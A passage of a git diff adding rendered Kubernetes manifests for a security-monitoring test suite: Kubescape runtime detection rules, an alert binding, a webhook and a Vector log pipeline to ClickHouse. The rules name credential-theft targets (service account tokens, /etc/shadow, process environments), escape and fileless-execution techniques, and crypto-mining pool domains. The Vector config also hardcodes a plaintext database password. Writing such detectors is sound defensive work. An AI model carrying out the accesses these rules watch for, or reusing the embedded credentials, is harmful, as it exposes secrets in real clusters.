'' + string(event.pid)' + uniqueId: event.comm + '_' + event.capName + ruleExpression: + - eventType: capabilities + expression: '!ap.was_capability_used(event.containerId, event.capName)' + profileDependency: 0 + severity: 1 + supportPolicy: false + isTriggerAlert: false + mitreTactic: TA0002 + 
mitreTechnique: T1059 + tags: + - anomaly + - capabilities + - applicationprofile + - name: DNS Anomalies in container + enabled: true + id: R0005 + description: Detecting unexpected domain requests that are not whitelisted by + application profile. + expressions: + message: '''Unexpected domain communication: '' + event.name + '' from: '' + + event.containerName' + uniqueId: event.comm + '_' + event.name + ruleExpression: + - eventType: dns + expression: '!event.name.endsWith(''.svc.cluster.local.'') && !nn.is_domain_in_egress(event.containerId, + event.name)' + profileDependency: 0 + severity: 1 + supportPolicy: false + isTriggerAlert: false + mitreTactic: TA0011 + mitreTechnique: T1071.004 + tags: + - dns + - anomaly + - networkprofile + - name: Unexpected service account token access + enabled: true + id: R0006 + description: Detecting unexpected access to service account token. + expressions: + message: '''Unexpected access to service account token: '' + event.path + '' + with flags: '' + event.flags.join('','')' + uniqueId: event.comm + ruleExpression: + - eventType: open + expression: "((event.path.startsWith('/run/secrets/kubernetes.io/serviceaccount')\ + \ && event.path.endsWith('/token')) || \n (event.path.startsWith('/var/run/secrets/kubernetes.io/serviceaccount')\ + \ && event.path.endsWith('/token')) ||\n (event.path.startsWith('/run/secrets/eks.amazonaws.com/serviceaccount')\ + \ && event.path.endsWith('/token')) ||\n (event.path.startsWith('/var/run/secrets/eks.amazonaws.com/serviceaccount')\ + \ && event.path.endsWith('/token'))) &&\n!ap.was_path_opened_with_suffix(event.containerId,\ + \ '/token')\n" + profileDependency: 0 + severity: 5 + supportPolicy: false + isTriggerAlert: true + mitreTactic: TA0006 + mitreTechnique: T1528 + tags: + - anomaly + - serviceaccount + - applicationprofile + - name: Workload uses Kubernetes API unexpectedly + enabled: true + id: R0007 + description: Detecting execution of kubernetes client + expressions: + message: 'eventType == ''exec'' ? ''Kubernetes client ('' + event.comm + '') + was executed with PID '' + string(event.pid) : ''Network connection to Kubernetes + API server from container '' + event.containerName' + uniqueId: 'eventType == ''exec'' ? ''exec_'' + event.comm : ''network_'' + event.dstAddr' + ruleExpression: + - eventType: exec + expression: (event.comm == 'kubectl' || event.exepath.endsWith('/kubectl')) + && !ap.was_executed(event.containerId, parse.get_exec_path(event.args, event.comm)) + - eventType: network + expression: event.pktType == 'OUTGOING' && k8s.is_api_server_address(event.dstAddr) + && !nn.was_address_in_egress(event.containerId, event.dstAddr) + profileDependency: 0 + severity: 5 + supportPolicy: false + isTriggerAlert: false + mitreTactic: TA0008 + mitreTechnique: T1210 + tags: + - exec + - network + - anomaly + - applicationprofile + - name: Read Environment Variables from procfs + enabled: true + id: R0008 + description: Detecting reading environment variables from procfs. 
+ expressions: + message: '''Reading environment variables from procfs: '' + event.path + '' + by process '' + event.comm' + uniqueId: event.comm + '_' + event.path + ruleExpression: + - eventType: open + expression: 'event.path.startsWith(''/proc/'') && event.path.endsWith(''/environ'') + && !ap.was_path_opened_with_suffix(event.containerId, ''/environ'') + + ' + profileDependency: 0 + severity: 5 + supportPolicy: false + isTriggerAlert: true + mitreTactic: TA0006 + mitreTechnique: T1552.001 + tags: + - anomaly + - procfs + - environment + - applicationprofile + - name: eBPF Program Load + enabled: true + id: R0009 + description: Detecting eBPF program load. + expressions: + message: '''bpf program load system call (bpf) was called by process ('' + event.comm + + '') with command (BPF_PROG_LOAD)''' + uniqueId: event.comm + '_' + 'bpf' + '_' + string(event.cmd) + ruleExpression: + - eventType: bpf + expression: event.cmd == uint(5) && !ap.was_syscall_used(event.containerId, + 'bpf') + profileDependency: 1 + severity: 5 + supportPolicy: false + isTriggerAlert: true + mitreTactic: TA0005 + mitreTechnique: T1218 + tags: + - bpf + - ebpf + - applicationprofile + - name: Unexpected Sensitive File Access + enabled: true + id: R0010 + description: Detecting access to sensitive files. + expressions: + message: '''Unexpected sensitive file access: '' + event.path + '' by process + '' + event.comm' + uniqueId: event.comm + '_' + event.path + ruleExpression: + - eventType: open + expression: event.path.startsWith('/etc/shadow') && !ap.was_path_opened(event.containerId, + event.path) + profileDependency: 1 + severity: 5 + supportPolicy: false + isTriggerAlert: true + mitreTactic: TA0006 + mitreTechnique: T1005 + tags: + - files + - anomaly + - applicationprofile + - name: Unexpected Egress Network Traffic + enabled: false + id: R0011 + description: Detecting unexpected egress network traffic that is not whitelisted + by application profile. 
+ expressions: + message: '''Unexpected egress network communication to: '' + event.dstAddr + + '':'' + string(event.dstPort) + '' using '' + event.proto + '' from: '' + + event.containerName' + uniqueId: event.dstAddr + '_' + string(event.dstPort) + '_' + event.proto + ruleExpression: + - eventType: network + expression: event.pktType == 'OUTGOING' && !net.is_private_ip(event.dstAddr) + && !nn.was_address_in_egress(event.containerId, event.dstAddr) + profileDependency: 0 + severity: 5 + supportPolicy: false + isTriggerAlert: false + mitreTactic: TA0010 + mitreTechnique: T1041 + tags: + - whitelisted + - network + - anomaly + - networkprofile + - name: Process executed from malicious source + enabled: true + id: R1000 + description: 'Detecting exec calls that are from malicious source like: /dev/shm' + expressions: + message: '''Execution from malicious source: '' + event.exepath + '' in directory + '' + event.cwd' + uniqueId: event.comm + '_' + event.exepath + '_' + event.pcomm + ruleExpression: + - eventType: exec + expression: '(event.exepath == ''/dev/shm'' || event.exepath.startsWith(''/dev/shm/'')) + || (event.cwd == ''/dev/shm'' || event.cwd.startsWith(''/dev/shm/'') || (parse.get_exec_path(event.args, + event.comm).startsWith(''/dev/shm/''))) + + ' + profileDependency: 2 + severity: 8 + supportPolicy: false + isTriggerAlert: true + mitreTactic: TA0002 + mitreTechnique: T1059 + tags: + - exec + - signature + - malicious + - name: Drifted process executed + enabled: true + id: R1001 + description: Detecting exec calls of binaries that are not included in the base + image + expressions: + message: '''Process ('' + event.comm + '') was executed and is not part of the + image''' + uniqueId: event.comm + '_' + event.exepath + '_' + event.pcomm + ruleExpression: + - eventType: exec + expression: "(event.upperlayer == true ||\n event.pupperlayer == true) &&\n\ + !ap.was_executed(event.containerId, parse.get_exec_path(event.args, event.comm))\n" + profileDependency: 1 + severity: 8 + supportPolicy: false + isTriggerAlert: true + mitreTactic: TA0005 + mitreTechnique: T1036 + tags: + - exec + - malicious + - binary + - base image + - applicationprofile + - name: Process tries to load a kernel module + enabled: true + id: R1002 + description: Detecting Kernel Module Load. 
+ expressions: + message: '''Kernel module ('' + event.module + '') loading attempt with syscall + ('' + event.syscallName + '') was called by process ('' + event.comm + '')''' + uniqueId: event.comm + '_' + event.syscallName + '_' + event.module + ruleExpression: + - eventType: kmod + expression: event.syscallName == 'init_module' || event.syscallName == 'finit_module' + profileDependency: 2 + severity: 10 + supportPolicy: false + isTriggerAlert: true + mitreTactic: TA0005 + mitreTechnique: T1547.006 + tags: + - kmod + - kernel + - module + - load + - name: Disallowed ssh connection + enabled: false + id: R1003 + description: Detecting ssh connection to disallowed port + expressions: + message: '''Malicious SSH connection attempt to '' + event.dstIp + '':'' + string(dyn(event.dstPort))' + uniqueId: event.comm + '_' + event.dstIp + '_' + string(dyn(event.dstPort)) + ruleExpression: + - eventType: ssh + expression: dyn(event.srcPort) >= 32768 && dyn(event.srcPort) <= 60999 && + !(dyn(event.dstPort) in [22, 2022]) && !nn.was_address_in_egress(event.containerId, + event.dstIp) + profileDependency: 1 + severity: 5 + supportPolicy: false + isTriggerAlert: true + mitreTactic: TA0008 + mitreTechnique: T1021.001 + tags: + - ssh + - connection + - port + - malicious + - networkprofile + - name: Process executed from mount + enabled: true + id: R1004 + description: Detecting exec calls from mounted paths. + expressions: + message: '''Process ('' + event.comm + '') was executed from a mounted path''' + uniqueId: event.comm + ruleExpression: + - eventType: exec + expression: '!ap.was_executed(event.containerId, parse.get_exec_path(event.args, + event.comm)) && k8s.get_container_mount_paths(event.namespace, event.podName, + event.containerName).exists(mount, event.exepath.startsWith(mount) || parse.get_exec_path(event.args, + event.comm).startsWith(mount))' + profileDependency: 1 + severity: 5 + supportPolicy: false + isTriggerAlert: true + mitreTactic: TA0002 + mitreTechnique: T1059 + tags: + - exec + - mount + - applicationprofile + - name: Fileless execution detected + enabled: true + id: R1005 + description: Detecting Fileless Execution + expressions: + message: '''Fileless execution detected: exec call "'' + event.comm + ''" is + from a malicious source''' + uniqueId: event.comm + '_' + event.exepath + '_' + event.pcomm + ruleExpression: + - eventType: exec + expression: event.exepath.contains('memfd') || event.exepath.startsWith('/proc/self/fd') + || event.exepath.matches('/proc/[0-9]+/fd/[0-9]+') + profileDependency: 2 + severity: 8 + supportPolicy: false + isTriggerAlert: true + mitreTactic: TA0005 + mitreTechnique: T1055 + tags: + - fileless + - execution + - malicious + - name: Process tries to escape container + enabled: true + id: R1006 + description: Detecting Unshare System Call usage, which can be used to escape + container. + expressions: + message: '''Unshare system call (unshare) was called by process ('' + event.comm + + '')''' + uniqueId: event.comm + '_' + 'unshare' + ruleExpression: + - eventType: unshare + expression: event.pcomm != 'runc' && !ap.was_syscall_used(event.containerId, + 'unshare') + profileDependency: 2 + severity: 5 + supportPolicy: false + isTriggerAlert: true + mitreTactic: TA0004 + mitreTechnique: T1611 + tags: + - unshare + - escape + - anomaly + - applicationprofile + - name: Crypto miner launched + enabled: true + id: R1007 + description: Detecting XMR Crypto Miners by randomx algorithm usage.
+ expressions: + message: '''XMR Crypto Miner process: ('' + event.exepath + '') executed''' + uniqueId: event.exepath + '_' + event.comm + ruleExpression: + - eventType: randomx + expression: 'true' + profileDependency: 2 + severity: 10 + supportPolicy: false + isTriggerAlert: true + mitreTactic: TA0040 + mitreTechnique: T1496 + tags: + - crypto + - miners + - malicious + - name: Crypto Mining Domain Communication + enabled: true + id: R1008 + description: Detecting Crypto miners communication by domain + expressions: + message: '''Communication with a known crypto mining domain: '' + event.name' + uniqueId: event.name + '_' + event.comm + ruleExpression: + - eventType: dns + expression: event.name in ['2cryptocalc.com.', '2miners.com.', 'antpool.com.', + 'asia1.ethpool.org.', 'bohemianpool.com.', 'botbox.dev.', 'btm.antpool.com.', + 'c3pool.com.', 'c4pool.org.', 'ca.minexmr.com.', 'cn.stratum.slushpool.com.', + 'dash.antpool.com.', 'data.miningpoolstats.stream.', 'de.minexmr.com.', + 'eth-ar.dwarfpool.com.', 'eth-asia.dwarfpool.com.', 'eth-asia1.nanopool.org.', + 'eth-au.dwarfpool.com.', 'eth-au1.nanopool.org.', 'eth-br.dwarfpool.com.', + 'eth-cn.dwarfpool.com.', 'eth-cn2.dwarfpool.com.', 'eth-eu.dwarfpool.com.', + 'eth-eu1.nanopool.org.', 'eth-eu2.nanopool.org.', 'eth-hk.dwarfpool.com.', + 'eth-jp1.nanopool.org.', 'eth-ru.dwarfpool.com.', 'eth-ru2.dwarfpool.com.', + 'eth-sg.dwarfpool.com.', 'eth-us-east1.nanopool.org.', 'eth-us-west1.nanopool.org.', + 'eth-us.dwarfpool.com.', 'eth-us2.dwarfpool.com.', 'eth.antpool.com.', 'eu.stratum.slushpool.com.', + 'eu1.ethermine.org.', 'eu1.ethpool.org.', 'fastpool.xyz.', 'fr.minexmr.com.', + 'kriptokyng.com.', 'mine.moneropool.com.', 'mine.xmrpool.net.', 'miningmadness.com.', + 'monero.cedric-crispin.com.', 'monero.crypto-pool.fr.', 'monero.fairhash.org.', + 'monero.hashvault.pro.', 'monero.herominers.com.', 'monerod.org.', 'monerohash.com.', + 'moneroocean.stream.', 'monerop.com.', 'multi-pools.com.', 'p2pool.io.', + 'pool.kryptex.com.', 'pool.minexmr.com.', 'pool.monero.hashvault.pro.', + 'pool.rplant.xyz.', 'pool.supportxmr.com.', 'pool.xmr.pt.', 'prohashing.com.', + 'rx.unmineable.com.', 'sg.minexmr.com.', 'sg.stratum.slushpool.com.', 'skypool.org.', + 'solo-xmr.2miners.com.', 'ss.antpool.com.', 'stratum-btm.antpool.com.', + 'stratum-dash.antpool.com.', 'stratum-eth.antpool.com.', 'stratum-ltc.antpool.com.', + 'stratum-xmc.antpool.com.', 'stratum-zec.antpool.com.', 'stratum.antpool.com.', + 'supportxmr.com.', 'trustpool.cc.', 'us-east.stratum.slushpool.com.', 'us1.ethermine.org.', + 'us1.ethpool.org.', 'us2.ethermine.org.', 'us2.ethpool.org.', 'web.xmrpool.eu.', + 'www.domajorpool.com.', 'www.dxpool.com.', 'www.mining-dutch.nl.', 'xmc.antpool.com.', + 'xmr-asia1.nanopool.org.', 'xmr-au1.nanopool.org.', 'xmr-eu1.nanopool.org.', + 'xmr-eu2.nanopool.org.', 'xmr-jp1.nanopool.org.', 'xmr-us-east1.nanopool.org.', + 'xmr-us-west1.nanopool.org.', 'xmr.2miners.com.', 'xmr.crypto-pool.fr.', + 'xmr.gntl.uk.', 'xmr.nanopool.org.', 'xmr.pool-pay.com.', 'xmr.pool.minergate.com.', + 'xmr.solopool.org.', 'xmr.volt-mine.com.', 'xmr.zeropool.io.', 'zec.antpool.com.', + 'zergpool.com.', 'auto.c3pool.org.', 'us.monero.herominers.com.', 'xmr.kryptex.network.'] + profileDependency: 2 + severity: 10 + supportPolicy: false + isTriggerAlert: true + mitreTactic: TA0011 + mitreTechnique: T1071.004 + tags: + - network + - crypto + - miners + - malicious + - dns + - name: Crypto Mining Related Port Communication + enabled: true + id: R1009 + description: Detecting Crypto 
Miners by suspicious port usage. + expressions: + message: '''Detected crypto mining related port communication on port '' + string(event.dstPort) + + '' to '' + event.dstAddr + '' with protocol '' + event.proto' + uniqueId: event.comm + '_' + string(event.dstPort) + ruleExpression: + - eventType: network + expression: event.proto == 'TCP' && event.pktType == 'OUTGOING' && event.dstPort + in [3333, 45700] && !nn.was_address_in_egress(event.containerId, event.dstAddr) + profileDependency: 1 + severity: 3 + supportPolicy: false + isTriggerAlert: false + mitreTactic: TA0011 + mitreTechnique: T1071 + tags: + - network + - crypto + - miners + - malicious + - networkprofile + - name: Soft link created over sensitive file + enabled: true + id: R1010 + description: Detects symlink creation over sensitive files + expressions: + message: '''Symlink created over sensitive file: '' + event.oldPath + '' -> + '' + event.newPath' + uniqueId: event.comm + '_' + event.oldPath + ruleExpression: + - eventType: symlink + expression: (event.oldPath.startsWith('/etc/shadow') || event.oldPath.startsWith('/etc/sudoers')) + && !ap.was_path_opened(event.containerId, event.oldPath) + profileDependency: 1 + severity: 5 + supportPolicy: true + isTriggerAlert: true + mitreTactic: TA0006 + mitreTechnique: T1005 + tags: + - anomaly + - symlink + - applicationprofile + - name: ld_preload hooks technique detected + enabled: false + id: R1011 + description: Detecting ld_preload hook techniques. + expressions: + message: 'eventType == ''exec'' ? ''Process ('' + event.comm + '') is using + a dynamic linker hook: '' + process.get_ld_hook_var(event.pid) : ''The dynamic + linker configuration file ('' + event.path + '') was modified by process ('' + + event.comm + '')''' + uniqueId: 'eventType == ''exec'' ? ''exec_'' + event.comm : ''open_'' + event.path' + ruleExpression: + - eventType: exec + expression: event.comm != 'java' && event.containerName != 'matlab' && process.get_ld_hook_var(event.pid) + != '' + - eventType: open + expression: event.path == '/etc/ld.so.preload' && has(event.flagsRaw) && event.flagsRaw + != 0 + profileDependency: 1 + severity: 5 + supportPolicy: true + isTriggerAlert: true + mitreTactic: TA0005 + mitreTechnique: T1574.006 + tags: + - exec + - malicious + - applicationprofile + - name: Hard link created over sensitive file + enabled: true + id: R1012 + description: Detecting hardlink creation over sensitive files. + expressions: + message: '''Hardlink created over sensitive file: '' + event.oldPath + '' - + '' + event.newPath' + uniqueId: event.comm + '_' + event.oldPath + ruleExpression: + - eventType: hardlink + expression: (event.oldPath.startsWith('/etc/shadow') || event.oldPath.startsWith('/etc/sudoers')) + && !ap.was_path_opened(event.containerId, event.oldPath) + profileDependency: 1 + severity: 5 + supportPolicy: true + isTriggerAlert: true + mitreTactic: TA0006 + mitreTechnique: T1005 + tags: + - files + - malicious + - applicationprofile + - name: Malicious Ptrace Usage + enabled: true + id: R1015 + description: Detecting potentially malicious ptrace usage. 
+ expressions: + message: '''Malicious ptrace usage detected from: '' + event.comm' + uniqueId: event.exepath + '_' + event.comm + ruleExpression: + - eventType: ptrace + expression: 'true' + profileDependency: 2 + severity: 5 + supportPolicy: false + isTriggerAlert: true + mitreTactic: TA0005 + mitreTechnique: T1622 + tags: + - process + - malicious + - name: Unexpected io_uring Operation Detected + enabled: true + id: R1030 + description: Detects io_uring operations that were not recorded during the initial + observation period, indicating potential unauthorized activity. + expressions: + message: '''Unexpected io_uring operation detected: (opcode='' + string(event.opcode) + + '') flags=0x'' + (has(event.flagsRaw) ? string(event.flagsRaw) : ''0'') + + '' in '' + event.comm + ''.''' + uniqueId: string(event.opcode) + '_' + event.comm + ruleExpression: + - eventType: iouring + expression: 'true' + profileDependency: 0 + severity: 5 + supportPolicy: true + isTriggerAlert: true + mitreTactic: TA0002 + mitreTechnique: T1218 + tags: + - syscalls + - io_uring + - applicationprofile +--- +apiVersion: kubescape.io/v1 +kind: RuntimeRuleAlertBinding +metadata: + name: all-rules-all-pods + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: node-agent + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: kubescape + app: node-agent + tier: ks-control-plane + kubescape.io/ignore: 'true' +spec: + namespaceSelector: + matchExpressions: + - key: kubernetes.io/metadata.name + operator: NotIn + values: + - kubescape + - kube-system + - kube-flannel + - ingress-nginx + - olm + - px-operator + - honey + - pl + - clickhouse + - kube-public + - kube-node-lease + - local-path-storage + - gmp-system + - gmp-public + - storm + - lightening + - cert-manager + rules: + - ruleName: Unexpected process launched + - ruleName: Files Access Anomalies in container + - ruleName: Syscalls Anomalies in container + - ruleName: Linux Capabilities Anomalies in container + - ruleName: DNS Anomalies in container + - ruleName: Unexpected service account token access + - ruleName: Workload uses Kubernetes API unexpectedly + - ruleName: Process executed from malicious source + - ruleName: Process tries to load a kernel module + - ruleName: Drifted process executed + - ruleName: Disallowed ssh connection + - ruleName: Fileless execution detected + - ruleName: Crypto miner launched + - ruleName: Process executed from mount + - ruleName: Crypto Mining Related Port Communication + - ruleName: Crypto Mining Domain Communication + - ruleName: Read Environment Variables from procfs + - ruleName: eBPF Program Load + - ruleName: Soft link created over sensitive file + - ruleName: Unexpected Sensitive File Access + - ruleName: Hard link created over sensitive file + - ruleName: Exec to pod + - ruleName: Port forward + - ruleName: Unexpected Egress Network Traffic + - ruleName: Malicious Ptrace Usage + - ruleName: Unexpected io_uring Operation Detected +--- +apiVersion: admissionregistration.k8s.io/v1 +kind: ValidatingWebhookConfiguration +metadata: + name: validation + annotations: null + labels: + helm.sh/chart: kubescape-operator-1.30.2 + app.kubernetes.io/name: kubescape-operator + app.kubernetes.io/instance: kubescape + app.kubernetes.io/component: operator + app.kubernetes.io/version: 1.30.2 + app.kubernetes.io/managed-by: Helm + app.kubernetes.io/part-of: 
kubescape + app: operator + tier: ks-control-plane + kubescape.io/ignore: 'true' +webhooks: +- name: validation.kubescape.admission + clientConfig: + service: + name: kubescape-admission-webhook + namespace: honey + path: /validate + port: 443 + caBundle: LS0tLS1CRUdJTiBDRVJUSUZJQ0FURS0tLS0tCk1JSURGekNDQWYrZ0F3SUJBZ0lRSWZrRGU0S0h2aFE1TlNGUWovWFk0ekFOQmdrcWhraUc5dzBCQVFzRkFEQVcKTVJRd0VnWURWUVFEREFzcUxtaHZibVY1TG5OMll6QWVGdzB5TmpBME1qVXdOak0xTVRoYUZ3MHlPVEF5TVRJdwpOak0xTVRoYU1CWXhGREFTQmdOVkJBTU1DeW91YUc5dVpYa3VjM1pqTUlJQklqQU5CZ2txaGtpRzl3MEJBUUVGCkFBT0NBUThBTUlJQkNnS0NBUUVBdzNWR1Nqc203dFNOeWwzdSsrY3FmdkplSmdRTDhwZG1qK0RBZWQya25oRE0KbVJWOHZtdXR1Unc2SE9rdlR4UmsyZnZUMWptRndHYWxMMVhqQ3M0SzZNQUJHS2VNTitpZUFIb0VXSXUzUENYYgpVdHc4SmVCNEZQWkpadEs5U0VLWElzVWVleTRBam5UNzFncmh0TkZkWFNoT2Y1a1AwaFlMR3V6MUFyaEUxR2pNCmlIaEJ4OWc1a1I1ZnpLcUphYVFZUk15ZnVlYmZVVUZjb2FyOG8xL1I2d1k0cE42KzdPYlE3UUhTSGM1bFN0SXoKWE50L0xjUjNIU0xVdVdEWkQ0UmN3dE1HSkEwRGdLcUExT1VrdzVSWW9DM3JVMHVlRG1rK2pzRVUrQUNDTEdqagpoYk9tcHJoSGs4bkkzcXRNYmM2bFVRRmlCdkRkSzFpdVd0Y3ZoOXNmbndJREFRQUJvMkV3WHpBT0JnTlZIUThCCkFmOEVCQU1DQXFRd0hRWURWUjBsQkJZd0ZBWUlLd1lCQlFVSEF3RUdDQ3NHQVFVRkJ3TUNNQThHQTFVZEV3RUIKL3dRRk1BTUJBZjh3SFFZRFZSME9CQllFRk54aGhTcjRmaFJydVJwWlpueVJZSlFqcDVaOE1BMEdDU3FHU0liMwpEUUVCQ3dVQUE0SUJBUUJLT0hDaGNoTHQwcS9DaGhJdUtSZ1Q4VUY4OXpWY2hPZzI2Q0J4cWFOQk1vRnhwZE43CmxzZ1VjSGpXY0FaalFRZlI3UlhORDkxL25pL0l6QjBGb2JqKzZPY2tncXNydlZQZzlJc29kTjhJTi9tZkJ1cG4KdkFpY0JyNFd5RHI0dFA3Yk1Ma1RKU2p6UVpOT2E1NVMvTTNRU0xOOW5IVWM0MW5nVUFyeUtXUDdCancySlRZNQprR1lDNWdXZjJXR0F6aG1tMjJmbmZrMXNPK0N1TnErSlBqWmNrR210ZUhCbkNnYUNsblRaNkFkeFUySWd6UlFZCndNUHpJajJBVUkzMXlNZlZLMkZmOU5NV0M0YVAwUk4va3cwaXNOaVpVR1NaZTAzQk05L3hhSy93VkJ1d3BFdlAKVjhYcGwrREtXWFkwcVZaMWwzTk5SNUJFSG5qZldKYisraUROCi0tLS0tRU5EIENFUlRJRklDQVRFLS0tLS0K + admissionReviewVersions: + - v1 + sideEffects: None + rules: + - operations: + - CREATE + - UPDATE + - DELETE + - CONNECT + apiGroups: + - '*' + apiVersions: + - v1 + resources: + - pods + - pods/exec + - pods/portforward + - pods/attach + - clusterrolebindings + - rolebindings + scope: '*' + failurePolicy: Ignore diff --git a/src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/helm-rendered/vector-values.yaml b/src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/helm-rendered/vector-values.yaml new file mode 100644 index 00000000000..051fb34d176 --- /dev/null +++ b/src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/helm-rendered/vector-values.yaml @@ -0,0 +1,87 @@ +# Vector Helm values for iximiuz lab — kubescape node-agent → ClickHouse +# Deploy: helm install vector vector/vector -n honey -f values.yaml + +role: "Agent" + +image: + repository: timberio/vector + pullPolicy: IfNotPresent + +resources: + requests: + cpu: 50m + memory: 64Mi + limits: + cpu: 200m + memory: 128Mi + +tolerations: + - operator: Exists + +env: + - name: NODE_NAME + valueFrom: + fieldRef: + fieldPath: spec.nodeName + +customConfig: + data_dir: /vector-data-dir + api: + enabled: true + address: 127.0.0.1:8686 + playground: false + + sources: + kubescape_nodeagent_logs: + type: kubernetes_logs + extra_label_selector: "app=node-agent" + + transforms: + kubescape_parse: + type: remap + inputs: + - kubescape_nodeagent_logs + source: | + . 
= parse_json!(.message) + + kubescape_filter: + type: filter + inputs: + - kubescape_parse + condition: '.BaseRuntimeMetadata != null' + + kubescape_enrich: + type: remap + inputs: + - kubescape_filter + source: | + .CloudMetadata = "empty" + .hostname = get_env_var!("NODE_NAME") + .event_time = to_unix_timestamp(now()) + del(.time) + + sinks: + kubescape_debug: + type: file + inputs: + - kubescape_enrich + encoding: + codec: json + path: "/tmp/kubescape.json" + + kubescape_clickhouse: + type: clickhouse + inputs: + - kubescape_enrich + database: forensic_db + table: kubescape_logs + endpoint: "http://clickhouse.forensic.austrianopencloudcommunity.org:8123" + skip_unknown_fields: true + date_time_best_effort: true + auth: + strategy: "basic" + user: pixie + password: pixie_password + batch: + max_bytes: 5000000 + timeout_secs: 2 diff --git a/src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/helm-rendered/vector.rendered.yaml b/src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/helm-rendered/vector.rendered.yaml new file mode 100644 index 00000000000..ed14ac92b4e --- /dev/null +++ b/src/e2e_test/perf_tool/pkg/suites/k8s/sovereign-soc/helm-rendered/vector.rendered.yaml @@ -0,0 +1,307 @@ +--- +# Source: vector/templates/serviceaccount.yaml +apiVersion: v1 +kind: ServiceAccount +metadata: + name: vector + namespace: "honey" + labels: + helm.sh/chart: vector-0.51.0 + app.kubernetes.io/name: vector + app.kubernetes.io/instance: vector + app.kubernetes.io/component: Agent + app.kubernetes.io/version: "0.54.0-distroless-libc" + app.kubernetes.io/managed-by: Helm + +automountServiceAccountToken: true +--- +# Source: vector/templates/configmap.yaml +apiVersion: v1 +kind: ConfigMap +metadata: + name: vector + namespace: "honey" + labels: + helm.sh/chart: vector-0.51.0 + app.kubernetes.io/name: vector + app.kubernetes.io/instance: vector + app.kubernetes.io/component: Agent + app.kubernetes.io/version: "0.54.0-distroless-libc" + app.kubernetes.io/managed-by: Helm + +data: + vector.yaml: | + api: + address: 127.0.0.1:8686 + enabled: true + playground: false + data_dir: /vector-data-dir + sinks: + kubescape_clickhouse: + auth: + password: pixie_password + strategy: basic + user: pixie + batch: + max_bytes: 5000000 + timeout_secs: 2 + database: forensic_db + date_time_best_effort: true + endpoint: http://clickhouse.forensic.austrianopencloudcommunity.org:8123 + inputs: + - kubescape_enrich + skip_unknown_fields: true + table: kubescape_logs + type: clickhouse + kubescape_debug: + encoding: + codec: json + inputs: + - kubescape_enrich + path: /tmp/kubescape.json + type: file + sources: + kubescape_nodeagent_logs: + extra_label_selector: app=node-agent + type: kubernetes_logs + transforms: + kubescape_enrich: + inputs: + - kubescape_filter + source: | + .CloudMetadata = "empty" + .hostname = get_env_var!("NODE_NAME") + .event_time = to_unix_timestamp(now()) + del(.time) + type: remap + kubescape_filter: + condition: .BaseRuntimeMetadata != null + inputs: + - kubescape_parse + type: filter + kubescape_parse: + inputs: + - kubescape_nodeagent_logs + source: | + . = parse_json!(.message) + type: remap +--- +# Source: vector/templates/rbac.yaml +# Permissions to use Kubernetes API. +# Requires that RBAC authorization is enabled. 
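The three transforms in the rendered ConfigMap above are the whole enrichment pipeline, so they are easy to model outside Vector when debugging what actually lands in forensic_db.kubescape_logs. A minimal Go sketch of the same semantics, not part of the patch; the sample log line and the NODE_NAME value are made up:

```go
package main

import (
	"encoding/json"
	"fmt"
	"os"
	"time"
)

// enrich mirrors kubescape_parse -> kubescape_filter -> kubescape_enrich:
// parse .message as JSON, keep only records with BaseRuntimeMetadata, then
// add CloudMetadata/hostname/event_time and drop the original "time" field.
func enrich(message string) (map[string]any, bool) {
	var rec map[string]any
	if err := json.Unmarshal([]byte(message), &rec); err != nil {
		return nil, false // parse_json! would abort the event here
	}
	if rec["BaseRuntimeMetadata"] == nil {
		return nil, false // kubescape_filter: .BaseRuntimeMetadata != null
	}
	rec["CloudMetadata"] = "empty"
	rec["hostname"] = os.Getenv("NODE_NAME")
	rec["event_time"] = time.Now().Unix()
	delete(rec, "time")
	return rec, true
}

func main() {
	// Hypothetical node-agent line; real alerts carry many more fields.
	line := `{"BaseRuntimeMetadata":{"alertName":"Unexpected process launched"},"time":"2026-02-03T04:05:06Z"}`
	if out, ok := enrich(line); ok {
		b, _ := json.Marshal(out)
		fmt.Println(string(b))
	}
}
```

The rendered RBAC objects for the Vector agent follow.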
+apiVersion: rbac.authorization.k8s.io/v1 +kind: ClusterRole +metadata: + name: vector + labels: + helm.sh/chart: vector-0.51.0 + app.kubernetes.io/name: vector + app.kubernetes.io/instance: vector + app.kubernetes.io/component: Agent + app.kubernetes.io/version: "0.54.0-distroless-libc" + app.kubernetes.io/managed-by: Helm + +rules: + - apiGroups: + - "" + resources: + - namespaces + - nodes + - pods + verbs: + - list + - watch +--- +# Source: vector/templates/rbac.yaml +apiVersion: rbac.authorization.k8s.io/v1 +kind: ClusterRoleBinding +metadata: + name: vector + labels: + helm.sh/chart: vector-0.51.0 + app.kubernetes.io/name: vector + app.kubernetes.io/instance: vector + app.kubernetes.io/component: Agent + app.kubernetes.io/version: "0.54.0-distroless-libc" + app.kubernetes.io/managed-by: Helm + +roleRef: + apiGroup: rbac.authorization.k8s.io + kind: ClusterRole + name: vector +subjects: + - kind: ServiceAccount + name: vector + namespace: "honey" +--- +# Source: vector/templates/service-headless.yaml +apiVersion: v1 +kind: Service +metadata: + name: vector-headless + namespace: "honey" + labels: + helm.sh/chart: vector-0.51.0 + app.kubernetes.io/name: vector + app.kubernetes.io/instance: vector + app.kubernetes.io/component: Agent + app.kubernetes.io/version: "0.54.0-distroless-libc" + app.kubernetes.io/managed-by: Helm + + annotations: +spec: + clusterIP: None + ports: + - name: api + port: 8686 + protocol: TCP + targetPort: 8686 + selector: + app.kubernetes.io/name: vector + app.kubernetes.io/instance: vector + app.kubernetes.io/component: Agent + type: ClusterIP +--- +# Source: vector/templates/service.yaml +apiVersion: v1 +kind: Service +metadata: + name: vector + namespace: "honey" + labels: + helm.sh/chart: vector-0.51.0 + app.kubernetes.io/name: vector + app.kubernetes.io/instance: vector + app.kubernetes.io/component: Agent + app.kubernetes.io/version: "0.54.0-distroless-libc" + app.kubernetes.io/managed-by: Helm + + annotations: +spec: + ports: + - name: api + port: 8686 + protocol: TCP + targetPort: 8686 + selector: + app.kubernetes.io/name: vector + app.kubernetes.io/instance: vector + app.kubernetes.io/component: Agent + type: ClusterIP +--- +# Source: 